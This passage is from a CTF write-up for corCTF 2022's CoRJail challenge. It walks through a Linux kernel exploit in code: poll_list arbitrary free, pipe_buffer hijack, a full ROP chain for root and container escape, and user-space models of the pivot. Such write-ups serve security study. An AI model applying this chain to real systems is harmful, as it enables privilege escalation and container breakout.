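        if (!looks_like_heap_ptr(tty) || (tty & 0x3ff) != 0)
            continue;               /* kmalloc-1024 objects are 1k aligned */
        if (looks_like_heap_ptr(leak[i + 1]) &&
            looks_like_heap_ptr(leak[i + 2]) &&
            looks_like_heap_ptr(leak[i + 3]))
            return tty;
    }
    return 0;
}
```

The scan advances one QWORD at a time because the key data starts 24 bytes into its own slot, so neighbouring objects do not begin on a 32-byte boundary of the leaked buffer.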

The Exploit - Hijacking Control Flow

We have made some progress: from a single Null Byte Overflow now we know the kernel base address and the address of an object in kmalloc-1024. Now we need to arbitrarily free this object.

    [...]

    for (int i = 2048; i < 2048 + 128; i++)
        free_seq_ops(i); // [1]

    for (int i = 0; i < 192; i++)
        create_poll_thread(i, 24, 3000, true); // [2]

    free_key(corrupted_key); // [3]
    sleep(1); // GC key

    *(uint64_t *)&data[0] = target_object - 0x18; // [4]

    for (int i = 0; i < MAX_KEYS; i++)
    {
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        keys[i] = alloc_key(n_keys++, key, 32); // [5]
    }

    [...]

First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]) [1], then we replace them with poll_list objects (green chunks in [Fig. 4A]) [2]. Note that the seq_operations structure used to corrupt the user key is also freed and it is also replaced by a poll_list structure. [Fig. 4A]

Now we free the corrupted key, causing a potential Use-After-Free situation over the poll_list. [3] To exploit the Use-After-Free, we reuse the setxattr() trick from the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to the address of the target object minus 0x18 bytes [4], then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory. In other words, since the chunk used by setxattr is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation. [5] Doing so, we overwrite the next field of the poll_list structure in kmalloc-32 with the address of our target object minus 0x18 bytes. [Fig. 4B]

Originally my goal was to arbitrarily free a tty_struct and get RIP control overwriting its tty_operations pointer. Then I changed my mind (too many checks!), and I decided to target a pipe_buffer structure.

    [...]
    
    for (int i = 0; i < 72; i++)
        free_tty(i); // [1]

    sleep(1); // GC TTYs

    for (int i = 0; i < 1024; i++)
        alloc_pipe_buff(i); // [2]

    [...]
    
    free_all_keys(false);

    for (int i = 0; i < 31; i++)
        keys[i] = alloc_key(n_keys++, buff, 600); // [3]

    for (int i = 0; i < 1024; i++)
        release_pipe_buff(i); // [4]

    [...]

We proceed by freeing all the TTYs, closing the ptmx devices [1], then we spray many pipe_buffer objects [2]. This way we replace all the tty_struct objects with pipe_buffer objects in kmalloc-1024. Then, we wait until the timers expire, and the pipe_buffer object pointed to by the next field of the corrupted poll_list is automatically freed. [Fig. 5A]

Finally, we free all user keys, and we reallocate them in kmalloc-1024: we use them to spray our ROP-chain. [3] One of the key payloads will overwrite the target pipe_buffer, overwriting the anon_pipe_buf_ops pointer with a pointer to a fake operations table containing a stack pivot gadget. Now we only need to close all pipes, triggering the call to pipe_release(). [4] This will execute our stack pivot gadget and we will finally be able to hijack control flow. [Fig. 5B]
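One way to read the 0x18 offset used earlier: if the freed chunk starts at target - 0x18 and a user key reuses it, the 0x18-byte key header ends exactly where the pipe_buffer begins, so payload offset 0 maps to the first byte of the pipe_buffer. The sketch below checks that arithmetic against a userspace model of struct pipe_buffer. The layout is an x86_64 assumption for this kernel version, priv stands in for the kernel's private field, and payload_offset() is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define KEY_HEADER_BYTES 0x18   /* rcu_head + datalen + padding before data[] */

/* Userspace model of struct pipe_buffer (40 bytes on x86_64). */
struct pipe_buffer_model {
    void *page;
    unsigned int offset, len;
    const void *ops;            /* pipe_buf_operations pointer, offset 0x10 */
    unsigned int flags;
    unsigned long priv;
};

/*
 * Offset inside the key payload that overlaps a given pipe_buffer field,
 * for a key allocated in the chunk starting at freed_chunk.
 */
static uint64_t payload_offset(uint64_t freed_chunk, uint64_t target,
                               size_t field_off)
{
    uint64_t data_start = freed_chunk + KEY_HEADER_BYTES;

    assert(target >= data_start);
    return target - data_start + field_off;
}
```

With freed_chunk equal to target - 0x18, the ops pointer is reached at payload offset 0x10. A default pipe holds 16 such buffers (640 bytes), which is consistent with the array living in kmalloc-1024.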

The Exploit - Escaping From The Container

We started with a single Off-By-Null vulnerability and we finally managed to hijack control flow. The last piece of the puzzle is the ROP-chain used to escape from the container. Let’s take a look at what I used in the exploit:

    buff = (char *)calloc(1, 1024);

    // Stack pivot    [1]
    *(uint64_t *)&buff[0x10] = target_object + 0x30;             // anon_pipe_buf_ops
    *(uint64_t *)&buff[0x38] = kernel_base + 0xffffffff81882840; // push rsi ; in eax, dx ; jmp qword ptr [rsi + 0x66]
    *(uint64_t *)&buff[0x66] = kernel_base + 0xffffffff810007a9; // pop rsp ; ret
    *(uint64_t *)&buff[0x00] = kernel_base + 0xffffffff813c6b78; // add rsp, 0x78 ; ret

    // ROP
    rop = (uint64_t *)&buff[0x80];

    // creds = prepare_kernel_cred(0)   [2]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= 0;                                // 0
    *rop ++= kernel_base + 0xffffffff810ebc90; // prepare_kernel_cred

    // commit_creds(creds)    [3]
    *rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
    *rop ++= 0;                                // 0
    *rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
    *rop ++= kernel_base + 0xffffffff810eba40; // commit_creds

    // task = find_task_by_vpid(1)    [4]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= 1;                                // pid
    *rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

    // switch_task_namespaces(task, init_nsproxy)    [4]
    *rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
    *rop ++= 0;                                // 0
    *rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
    *rop ++= kernel_base + 0xffffffff8100051c; // pop rsi ; ret
    *rop ++= kernel_base + 0xffffffff8245a720; // init_nsproxy
    *rop ++= kernel_base + 0xffffffff810ea4e0; // switch_task_namespaces

    // new_fs = copy_fs_struct(init_fs)    [5]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= kernel_base + 0xffffffff82589740; // init_fs
    *rop ++= kernel_base + 0xffffffff812e7350; // copy_fs_struct
    *rop ++= kernel_base + 0xffffffff810e6cb7; // push rax ; pop rbx ; ret

    // current = find_task_by_vpid(getpid())    [6]
    *rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
    *rop ++= getpid();                         // pid
    *rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

    // current->fs = new_fs    [7]
    *rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
    *rop ++= 0x6e0;                            // offset of the fs field in task_struct
    *rop ++= kernel_base + 0xffffffff8102396f; // add rax, rcx ; ret
    *rop ++= kernel_base + 0xffffffff817e1d6d; // mov qword ptr [rax], rbx ; pop rbx ; ret
    *rop ++= 0;                                // rbx

    // kpti trampoline    [8]
    *rop ++= kernel_base + 0xffffffff81c00ef0 + 22; // swapgs_restore_regs_and_return_to_usermode + 22
    *rop ++= 0;
    *rop ++= 0;
    *rop ++= (uint64_t)&win;
    *rop ++= usr_cs;
    *rop ++= usr_rflags;
    *rop ++= (uint64_t)(stack + 0x5000);
    *rop ++= usr_ss;

The first part of the ROP-chain is nothing special. We use a stack pivot gadget to hijack control flow [1], then prepare_kernel_cred() [2] and commit_creds() [3] to escalate privileges, and then we locate the Docker container task using find_task_by_vpid() and use switch_task_namespaces() to replace its nsproxy structure with init_nsproxy [4]. Unfortunately, in this case, this is not enough to escape from the container.
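To see why the ROP-chain in the listing starts at buff[0x80], the stack pivot [1] can be traced by hand. The following is a small user-space model of that trace, a sketch under stated assumptions rather than anything that runs in the kernel: the gadget values and FAKE_TARGET are placeholders, and it assumes, as the offsets in the listing imply, that the payload lands at target_object + 0, that the ops pointer sits at offset 0x10 of pipe_buffer, that the release handler sits at offset 0x08 of the ops table, and that rsi holds the pipe_buffer address when release() is called.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Placeholder values: only their identity matters in this model. */
#define FAKE_TARGET  0x1000ULL /* stands in for target_object */
#define G_PUSH_RSI   0xA1ULL   /* push rsi ; in eax, dx ; jmp [rsi + 0x66] */
#define G_POP_RSP    0xA2ULL   /* pop rsp ; ret */
#define G_ADD_RSP_78 0xA3ULL   /* add rsp, 0x78 ; ret */

/* Read 8 bytes at a fake "kernel address" inside the modeled object. */
static uint64_t rd64(const uint8_t *obj, uint64_t addr)
{
    uint64_t v;
    memcpy(&v, obj + (addr - FAKE_TARGET), sizeof(v));
    return v;
}

/* Write 8 bytes at an offset inside the modeled object. */
static void wr64(uint8_t *obj, uint64_t off, uint64_t v)
{
    memcpy(obj + off, &v, sizeof(v));
}

/* Returns the offset inside the object where rsp points after the pivot. */
static uint64_t pivot_landing_offset(void)
{
    uint8_t obj[1024] = {0};
    uint64_t rsi, ops, release, rsp, rip;

    /* Same layout as the "Stack pivot" part of the listing. */
    wr64(obj, 0x10, FAKE_TARGET + 0x30);
    wr64(obj, 0x38, G_PUSH_RSI);
    wr64(obj, 0x66, G_POP_RSP);
    wr64(obj, 0x00, G_ADD_RSP_78);

    rsi = FAKE_TARGET;               /* second argument of release() */
    ops = rd64(obj, rsi + 0x10);     /* fake ops table at target + 0x30 */
    release = rd64(obj, ops + 0x08); /* release handler at target + 0x38 */
    assert(release == G_PUSH_RSI);

    /* push rsi ; jmp [rsi + 0x66] */
    rip = rd64(obj, rsi + 0x66);
    assert(rip == G_POP_RSP);

    /* pop rsp loads the pushed rsi ; ret then pops obj[0x00] */
    rsp = rsi;
    rip = rd64(obj, rsp);
    rsp += 8;
    assert(rip == G_ADD_RSP_78);

    /* add rsp, 0x78 ; the next ret fetches the first ROP entry from here */
    rsp += 0x78;
    return rsp - FAKE_TARGET;
}
```

In this model, the final ret reads its target from offset 0x08 + 0x78 = 0x80, which matches rop = (uint64_t *)&buff[0x80] in the listing.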

In Docker containers, unlike in Google’s kCTF, setns() is blocked by default by seccomp. This means that we cannot use it to enter another namespace after returning to user space. We need to find an alternative approach, and we need to implement it in the ROP-chain.
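Whether setns() is actually filtered in a given environment can be probed from user space without any privileges. The sketch below is an illustration, not part of the original exploit: the function name setns_looks_blocked() is hypothetical, and it assumes that a seccomp filter denies the call with EPERM or ENOSYS, while an unfiltered call with an invalid file descriptor fails with EBADF.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <sched.h>

/* Returns 1 if setns() looks filtered, 0 if the call reached the kernel,
 * and -1 if the result is inconclusive. */
static int setns_looks_blocked(void)
{
    /* -1 is never a valid fd, so an unfiltered call should fail with EBADF
     * before any namespace is touched. */
    if (setns(-1, 0) == 0)
        return -1; /* not expected with an invalid fd */
    if (errno == EPERM || errno == ENOSYS)
        return 1;  /* assumption: typical errno values for a seccomp denial */
    if (errno == EBADF)
        return 0;
    return -1;
}
```

A result of 1 inside the container is the situation described above: even with root credentials and init_nsproxy installed, the process cannot simply call setns() once it is back in user space.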

Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can reproduce part of its behavior by using copy_fs_struct() to clone the init_fs structure [5]. Then we locate the current task using find_task_by_vpid() [6] and manually install the new fs_struct using a write-what-where gadget [7]. Finally, we can use the KPTI trampoline with swapgs_restore_regs_and_return_to_usermode to get a shell on the host [8]. Here is the final exploit in action:

As you can see, the flag file did not contain a real flag, but a weird message:

Hello Hacker.

Unfortunately, the flag you are looking for is not here.
You need a CoR Flag License to unlock it.

Please visit https://flag-license.cor.team to buy one.

Use the CoR Promo Code WINDOWSISMYLIFE-06612CF0B3DC2776 to get a $0.99 discount.  

Regards,
The CoR Team.

I wanted to insert a small Easter egg in the challenge, so I created a fake website. Users were asked to visit https://flag-license.cor.team (note that at the time of writing the website is still up, but by the time you read this article it might be down) and fill in a CoR Flag License Purchase Form to buy a CoR Flag License for the modest price of $1337.00/day. The CoR Promo Code WINDOWSISMYLIFE-06612CF0B3DC2776 (cough cough …note the sarcasm… cough cough) is the lucky one, and the player who uses it wins a free CoR Flag License. The license code can later be used to unlock the real flag.

The final exploit can be found here: corjail_exploit.c.

Note: In the exploit, I use the assign_to_core() function to assign the process to another core before creating poll threads. This is useful to reduce the noise that thread creation causes on core 0 slabs. Once a thread has been created, it is assigned back to core 0 right before the poll() call using assign_thread_to_core(), a pthread_attr_setaffinity_np() wrapper.
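The body of assign_to_core() is not shown in this article, so the following is only a plausible sketch of such a helper, assuming it is a thin wrapper around sched_setaffinity(). The real function in corjail_exploit.c may differ in signature and error handling.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>

/* Pin the calling thread to a single CPU core. Returns 0 on success and
 * -1 on failure (errno is set by sched_setaffinity()). */
static int assign_to_core(int core_id)
{
    cpu_set_t mask;

    assert(core_id >= 0 && core_id < CPU_SETSIZE);
    CPU_ZERO(&mask);
    CPU_SET(core_id, &mask);
    /* A pid of 0 means "the calling thread". */
    return sched_setaffinity(0, sizeof(mask), &mask);
}
```

Pinning matters here because the allocator keeps per-CPU slabs: allocations made while running on another core do not disturb the carefully prepared slabs on core 0.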

Conclusion

poll_list objects can be used to get a powerful arbitrary free primitive in almost every general purpose cache. Many recent vulnerabilities can be exploited using this structure in the complete absence of msg_msg objects.

This challenge was a hard one and, considering the 48-hour limit and the presence of other hard challenges, it only had one solver. A big shout-out goes to Kylebot for getting first blood. It turns out that extended security attributes were usable inside the container without requiring any special capability, so he could solve the challenge by transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow, targeting the list.next pointer of a simple_xattr structure in kmalloc-192.

This cache is unaligned, so he made the corrupted pointer point into the middle of another simple_xattr object in the same slab. There, he forged a fake header and obtained an Out-Of-Bounds Read primitive, which led to an information leak.

Finally, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach, isn’t it?

If you have any questions or need any clarification, feel free to contact me. You can find my contact information in About.

You can download CoRJail from the corCTF 2022 Public Archive.

References

Syscall statistics patch

Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

modprobe_path trick

Unlinking attack with simple_xattr